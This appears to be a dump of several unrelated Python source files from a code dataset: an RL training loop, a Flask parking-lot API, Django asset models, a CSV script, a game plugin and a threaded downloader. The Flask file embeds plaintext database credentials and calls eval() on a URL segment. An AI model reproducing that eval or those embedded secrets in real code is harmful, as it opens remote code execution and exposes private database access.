reduction=reduction).mean(-1)\n a_hat = icm.inverse_pred(state, new_state)\n inv_loss = cross_entropy(input=a_hat, target=action.detach(), reduction=reduction)\n\n # Total loss\n inv_loss = (1 - self.beta) * inv_loss\n fwd_loss = self.beta * fwd_loss * 288\n loss = self.tau * policy_loss + inv_loss + fwd_loss\n\n if self.per:\n error = np.clip((torch.abs(q - y)).cpu().data.numpy(), 0, 0.8)\n inv_prob = (1 - softmax(a_hat, dim=1)[torch.arange(self.bs), action]) / 5\n curiosity_error = torch.abs(inv_prob).cpu().data.numpy()\n total_error = error + curiosity_error\n\n # update priorities\n for k in range(self.bs):\n memory.update(idxs[k], total_error[k])\n\n loss = (loss * torch.FloatTensor(w_is).to(sett.device)).mean()\n\n policy_opt.zero_grad()\n icm_opt.zero_grad()\n loss.backward()\n for param in policy.parameters():\n param.grad.data.clamp(-1, 1)\n policy_opt.step()\n icm_opt.step()\n\n self.target_count[i] += 1\n if self.target_count[i] == self.target_interval:\n self.target_count[i] = 0\n self.target[i].update_target(self.policy[i])\n\n if self.logger is not None:\n self.logger.log_scalar(tag='Policy Loss %i' % i, value=policy_loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='ICM Fwd Loss %i' % i, 
value=fwd_loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='ICM Inv Loss %i' % i, value=inv_loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Total Policy Loss %i' % i, value=loss.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Mean Curiosity Reward %i' % i, value=curiosity_rewards.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Q values %i' % i, value=q.mean().cpu().data.numpy())\n self.logger.log_scalar(tag='Target Boltz %i' % i, value=y.mean().cpu().data.numpy())\n actions = self.counter_policies[i] / max(1, self.counter_policies[i].sum())\n self.logger.log_text(tag='Policy actions %i Text' %i, value=[str(v) for v in actions],\n step=self.logger.step)\n if self.per:\n self.logger.log_scalar(tag='PER Error %i' % i, value=total_error.mean())\n self.logger.log_scalar(tag='PER Error Policy %i' % i, value=error.mean())\n self.logger.log_scalar(tag='PER Error Curiosity %i' % i, value=curiosity_error.mean())\n\n # Reduce sub eps\n self.eps_sub = self.eps_sub * self.eps_sub_decay\n\n # Train Macro policy\n if len(self.macro_memory) < self.bs * 100:\n return\n\n # Reduce eps\n self.eps = self.eps * self.eps_decay\n\n state, new_state, action, reward, is_terminal = self.macro_memory.sample(self.bs)\n if self.norm_input:\n state = np.array(state, dtype=np.float) / 255\n new_state = np.array(new_state, dtype=np.float) / 255\n\n state = torch.tensor(state, dtype=torch.float).detach().to(sett.device)\n new_state = torch.tensor(new_state, dtype=torch.float).detach().to(sett.device)\n action = torch.tensor(action).detach().to(sett.device)\n reward = torch.tensor(reward, dtype=torch.float).detach().to(sett.device)\n is_terminal = 1. - torch.tensor(is_terminal, dtype=torch.float).detach().to(sett.device)\n\n q = self.macro.forward(state)[torch.arange(self.bs), action]\n max_action = torch.argmax(self.macro.forward(new_state), dim=1)\n y = reward + self.gamma_macro * self.macro_target.forward(new_state)[torch.arange(self.bs), max_action] * is_terminal\n loss = smooth_l1_loss(input=q, target=y.detach())\n\n loss.backward()\n for param in self.macro.parameters():\n param.grad.data.clamp(-1, 1)\n self.macro_opt.step()\n\n self.macro_count += 1\n if self.macro_count == self.target_interval:\n self.macro_count = 0\n self.macro_target.update_target(self.macro)\n\n if self.logger is not None:\n self.logger.log_scalar(tag='Macro Loss', value=loss.cpu().detach().numpy())\n self.logger.log_scalar(tag='Sub Eps', value=self.eps_sub)\n self.logger.log_scalar(tag='Macro Eps', value=self.eps)\n values = self.counter_macro / max(1, sum(self.counter_macro))\n self.logger.log_text(tag='Macro Policy Actions Text', value=[str(v) for v in values],\n step=self.logger.step)\n self.logger.log_histogram(tag='Macro Policy Actions Hist', values=values,\n step=self.logger.step, bins=self.n_subpolicy)\n self.logger.log_scalar(tag='Macro Q values', value=q.cpu().detach().numpy().mean())\n self.logger.log_scalar(tag='Marcro Target Boltz', value=y.cpu().detach().numpy().mean())\n","sub_path":"src/rl/ehdqn.py","file_name":"ehdqn.py","file_ext":"py","file_size_in_byte":16387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"623477271","text":"#!python\nfrom flask import Flask, jsonify, make_response, request, send_from_directory\nfrom flask_sqlalchemy import SQLAlchemy\nfrom time import sleep\nfrom random import sample\nfrom sqlalchemy.dialects.postgresql import UUID\nfrom models import *\nimport geopy.distance\n\nPOSTGRES = {\n 'user': 
\nPOSTGRES = {\n    'user': 'smartlot_db_admin',\n    'pw': 'smarterparking1',\n    'db': 'smartlot_db_public2',\n    'host': 'smartlot-db-public2.cxzkctjwsfey.us-east-1.rds.amazonaws.com',\n    'port': '5432',\n}\n\napp = Flask(__name__, static_url_path='/static')\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://%(user)s:%(pw)s@%(host)s:%(port)s/%(db)s' % POSTGRES\n\ndb = SQLAlchemy(app)\n\n\n@app.route('/')\ndef index():\n    return \"Hewwo wowwd\"\n\n@app.route('/smart-lot/lots/upload', methods=['POST'])\ndef upload_file():\n    if 'file' not in request.files:\n        return \"No file\"\n    file = request.files['file']\n    file.save(\"static/test.jpg\")\n    return \"Saved successfully\"\n\n@app.route('/smart-lot/lots', methods=['GET'])\ndef get_tasks():\n    # Return every lot in the database\n    lots = [row.as_dict() for row in db.session.query(Lots).all()]\n    return jsonify({'lots': lots})\n\n@app.route('/smart-lot/lots/<lot_name>', methods=['GET'])\ndef get_lot(lot_name):\n    # CAUTION: eval() on a URL segment is unsafe; restrict lot_name to known model names in production\n    lot_info = db.session.query(eval(lot_name)).all()\n    rows = []\n    for row in lot_info:\n        rows.append(row.as_dict())\n    if len(lot_info) == 0:\n        abort(404)\n    response = jsonify(rows)\n    response.headers.add('Access-Control-Allow-Origin', '*')\n    return response\n\n@app.route('/smart-lot/lots/by_location/<lat_long>', methods=['GET'])\ndef get_lots_by_location(lat_long):\n    location_list = lat_long.split(\",\")\n    my_coords = (float(location_list[0]), float(location_list[1]))\n    lots = []\n    lot_info = db.session.query(Lots).all()\n    for row in lot_info:\n        lot_coords = (row.latitude, row.longitude)\n        if geopy.distance.distance(my_coords, lot_coords).mi < 20:\n            lots.append(row.as_dict())\n\n    if not lots:\n        abort(404)\n    response = jsonify(lots)\n    response.headers.add('Access-Control-Allow-Origin', '*')\n    return response\n    \ndef get_all_rows():\n    rows = db.session.query(NethkenA).all()\n    return rows\n\n# flag should be 0 or 1\n# 1 being true, 0 being false\n@app.route('/smart-lot/test/<int:api_flag>', methods=['GET'])\ndef flag_bit(api_flag):\n    spots = simulate_activity(api_flag)\n    if isinstance(spots, str):\n        return spots\n    return ''.join(['spot: {}\\noccupied:{}\\n'.format(\n        i.spot_number, i.occupied) for i in spots])\n\ndef simulate_activity(flag):\n    if flag:\n        spots = db.session.query(NethkenA).all()\n        for i in sample(range(1, len(spots)), 3):\n            temp_spot = db.session.query(\n                NethkenA).filter_by(spot_number=i).first()\n            if temp_spot.spot_number == i and temp_spot.occupied == True:\n                row_changed = db.session.query(NethkenA).filter_by(\n                    spot_number=i).update(dict(occupied=False))\n                db.session.commit()\n            elif temp_spot.spot_number == i and temp_spot.occupied == False:\n                row_changed = db.session.query(NethkenA).filter_by(\n                    spot_number=i).update(dict(occupied=True))\n                db.session.commit()\n        return spots\n    else:\n        return \"stopped\"\n\n@app.errorhandler(404)\ndef not_found(error):\n    return make_response(jsonify({'error': 'Not found'}), 404)\n\n### POST for JSON data if we need it down the road ###\n# @app.route('/smart-lot/lots', methods=['POST'])\n# def create_task():\n#     if not request.json or not 'title' in request.json:\n#         abort(400)\n#     lot = {\n#         'id': tasks[-1]['id'] + 1,\n#         'title': request.json['title'],\n#         'description': request.json.get('description', \"\"),\n#         'done': False\n#     }\n#     tasks.append(lot)\n#     return jsonify({'lot': lot}), 201\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"lot-availability-api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21976880","text":"import csv\n\ndef get_csv(csvfile):\n    csvdict = []\n    with open(csvfile) as f:\n        for item in csv.DictReader(f, skipinitialspace=True):\n            csvdict.append(item)\n    return csvdict\n
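\n# The aggregation below assumes the CSV is already sorted by 'Type', so each\n# instance type forms one contiguous block. A sketch of the expected input\n# (column names taken from the code, values illustrative):\n#\n#     Type,Avg,Max\n#     m5.large,12.0,40.0\n#     m5.large,18.0,55.0\n#     t3.micro,3.0,9.0\n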
\ninstances = get_csv('import-running.csv')\ninsttype = None\navgCPU = 0.0\nmaxCPU = 0.0\ncount = 0\nfor inst in instances:\n    if insttype != inst['Type']:\n        # Flush the previous group before starting a new one\n        if insttype is not None:\n            print(f'{insttype},{count},{avgCPU},{maxCPU}')\n        insttype = inst['Type']\n        avgCPU = 0.0\n        maxCPU = 0.0\n        count = 0\n    # Running average and maximum CPU for the current instance type\n    avgCPU = (avgCPU * count + float(inst['Avg'])) / (count + 1)\n    maxCPU = max(maxCPU, float(inst['Max']))\n    count += 1\n# Flush the final group\nif insttype is not None:\n    print(f'{insttype},{count},{avgCPU},{maxCPU}')\n","sub_path":"import.io/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368160090","text":"from django.contrib.gis.db import models\nfrom django.contrib.gis.geos import Point\nfrom phonenumber_field.modelfields import PhoneNumberField\n\nfrom assets.utils import geocode_address\n\n\nclass AssetType(models.Model):\n    \"\"\" Asset types \"\"\"\n    name = models.CharField(max_length=255)\n    title = models.CharField(max_length=255)\n    category = models.ForeignKey('Category', on_delete=models.PROTECT, related_name='asset_types', null=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass Category(models.Model):\n    \"\"\" Categories \"\"\"\n    name = models.CharField(max_length=255)\n    title = models.CharField(max_length=255)\n\n    class Meta:\n        verbose_name_plural = 'categories'\n\n    def __str__(self):\n        return self.name\n\n\nclass Tag(models.Model):\n    \"\"\" Tags \"\"\"\n    name = models.CharField(max_length=255)\n\n    def __str__(self):\n        return self.name\n\n\nclass Location(models.Model):\n    name = models.CharField(max_length=255, editable=False)\n    street_address = models.CharField(max_length=100, null=True, blank=True)\n    city = models.CharField(max_length=50, null=True, blank=True)\n    state = models.CharField(max_length=50, null=True, blank=True)\n    zip_code = models.CharField(max_length=10, null=True, blank=True)\n    parcel_id = models.CharField(max_length=50, null=True, blank=True)\n    residence = models.BooleanField(null=True, blank=True)\n\n    available_transportation = models.TextField(null=True, blank=True)\n    parent_location = models.ForeignKey(\n        'Location',\n        on_delete=models.PROTECT,\n        null=True,\n        blank=True\n    )\n    latitude = models.FloatField(null=True, blank=True)\n    longitude = models.FloatField(null=True, blank=True)\n    geom = models.PointField(null=True)\n\n    def __str__(self):\n        return self.name\n\n    def save(self, *args, **kwargs):\n        \"\"\" When the model is saved, attempt to geocode it based on address \"\"\"\n        if not self.pk:\n            self.name = f'{self.street_address} {self.city}, {self.state} {self.zip_code}'\n        if not (self.longitude or self.latitude):\n            self.latitude, self.longitude = geocode_address(self.name)\n        if not self.geom:\n            self.geom = Point(\n                (float(self.longitude), float(self.latitude))\n            ) if self.latitude and self.longitude else None\n        super(Location, self).save(*args, **kwargs)\n
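\n\n# Usage sketch for the geocoding hook above (hypothetical values): saving a\n# Location with only address fields fills in name, latitude/longitude and geom:\n#\n#     loc = Location(street_address='123 Main St', city='Pittsburgh',\n#                    state='PA', zip_code='15213')\n#     loc.save()  # geocode_address() runs, then geom is built from the result\n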
\n\nclass Organization(models.Model):\n    name = models.CharField(max_length=255, null=True, blank=True)\n    location = models.ForeignKey('Location', on_delete=models.CASCADE, null=True, blank=True)\n    email = models.EmailField(null=True, blank=True)\n    phone = PhoneNumberField(null=True, blank=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass AccessibilityFeature(models.Model):\n    name = models.CharField(max_length=255)\n\n    def __str__(self):\n        return self.name\n\n\nclass ProvidedService(models.Model):\n    name = models.CharField(max_length=255)\n\n    def __str__(self):\n        return self.name\n\n\nclass TargetPopulation(models.Model):\n    name = models.CharField(max_length=255)\n\n    def __str__(self):\n        return self.name\n\n\nclass DataSource(models.Model):\n    name = models.CharField(max_length=255)\n    url = models.URLField(max_length=500, null=True, blank=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass Asset(models.Model):\n    FIXED_LOCALE = 'FIX'\n    MOBILE_LOCALE = 'MOB'\n    VIRTUAL_LOCALE = 'VIR'\n\n    LOCALIZABILITY_CHOICES = (\n        (FIXED_LOCALE, 'Fixed'),\n        (MOBILE_LOCALE, 'Mobile'),\n        (VIRTUAL_LOCALE, 'Cyber'),\n    )\n\n    name = models.CharField(max_length=255)\n    localizability = models.CharField(max_length=3, choices=LOCALIZABILITY_CHOICES, null=True, blank=True)\n\n    url = models.URLField(max_length=500, null=True, blank=True)\n    email = models.EmailField(null=True, blank=True)\n    phone = PhoneNumberField(null=True, blank=True)\n\n    hours_of_operation = models.TextField(null=True, blank=True)\n    holiday_hours_of_operation = models.TextField(null=True, blank=True)\n    periodicity = models.CharField(max_length=100, null=True, blank=True)\n    capacity = models.IntegerField(null=True, blank=True)\n    wifi_network = models.CharField(max_length=100, null=True, blank=True)\n\n    child_friendly = models.BooleanField(null=True, blank=True)\n    internet_access = models.BooleanField(null=True, blank=True)\n    computers_available = models.BooleanField(null=True, blank=True)\n    open_to_public = models.BooleanField(null=True, blank=True)\n    sensitive = models.BooleanField(null=True, blank=True)\n    do_not_display = models.BooleanField(null=True, blank=True)\n\n    asset_types = models.ManyToManyField('AssetType')\n    categories = models.ManyToManyField('Category') # plural name keeps the field distinct from the category property below\n    location = models.ForeignKey('Location', on_delete=models.SET_NULL, null=True, blank=True)\n    organization = models.ForeignKey('Organization', on_delete=models.PROTECT, null=True, blank=True)\n    services = models.ManyToManyField('ProvidedService', blank=True)\n    accessibility_features = models.ManyToManyField('AccessibilityFeature', blank=True)\n    hard_to_count_population = models.ManyToManyField('TargetPopulation', blank=True)\n    data_source = models.ForeignKey('DataSource', on_delete=models.PROTECT, null=True, blank=True)\n\n    tags = models.ManyToManyField('Tag', blank=True)\n    etl_notes = models.TextField(null=True, blank=True) # notes from Rocket\n    notes = models.TextField(max_length=1000, null=True, blank=True)\n    primary_key_from_rocket = models.TextField(null=True, blank=True)\n    date_entered = models.DateTimeField(editable=False, auto_now_add=True)\n    last_updated = models.DateTimeField(editable=False, auto_now=True)\n\n    @property\n    def category(self):\n        # Derive a single category from the first associated asset type, if any\n        first_type = self.asset_types.first()\n        return first_type.category if first_type else None\n\n    def __str__(self):\n        return self.name\n","sub_path":"assets/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"449081669","text":"\"\"\"\r\nHeal streaks. 
Because Enari said so.\r\n\r\nMaintainer: hompy\r\n\"\"\"\r\n\r\nSTREAK_REQUIREMENT = 8\r\n\r\nS_REFILLED = \"Your killstreak earns you a refill!\"\r\n\r\ndef apply_script(protocol, connection, config):\r\n    class HealstreakConnection(connection):\r\n        def add_score(self, score):\r\n            connection.add_score(self, score)\r\n            # Refill on every STREAK_REQUIREMENT-th kill (8, 16, 24, ...); checking the\r\n            # streak first keeps non-kill score events at streak 0 from triggering a refill\r\n            if self.streak and self.streak % STREAK_REQUIREMENT == 0:\r\n                self.refill()\r\n                self.send_chat(S_REFILLED)\r\n    \r\n    return protocol, HealstreakConnection","sub_path":"healstreak.py","file_name":"healstreak.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"370817108","text":"import urllib3\nfrom threading import Thread\n\nurllib3.disable_warnings()\n\n__author__ = \"Mithun\"\n\n\nclass URLDownload(Thread):\n    def __init__(self, file_name, url):\n        Thread.__init__(self)\n        self.file_name = \"Thread_\" + file_name\n        self.url = url\n\n    def run(self):\n        print(\"Downloading the contents of {} into {}\".format(self.url, self.file_name))\n        http = urllib3.PoolManager()\n\n        response = http.request(method=\"GET\", url=self.url)\n        with open(self.file_name, \"wb\") as f:\n            f.write(response.data)\n\n        print(\"Download of {} done\".format(self.url))\n\n\nthreads = []\ntest_dict = {\n    \"Google\": \"http://www.google.com\",\n    \"Python\": \"http://www.python.org\",\n    \"Bing\": \"http://www.bing.com\",\n    \"Yahoo\": \"http://www.yahoo.com\"\n}\n\nprint(\"Main thread starting execution...\")\nfor key in test_dict:\n    thread = URLDownload(key, test_dict[key])\n    threads.append(thread)\n    thread.start()\n\nprint(\"Main thread continuing execution...\")\nfor thread in threads:\n    thread.join()\n\nprint(\"Main thread exiting...\")\n","sub_path":"10_back_dev/paradigms/concurrent/Concurrent Programming in Python - Section 2/2.3-initial.py","file_name":"2.3-initial.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}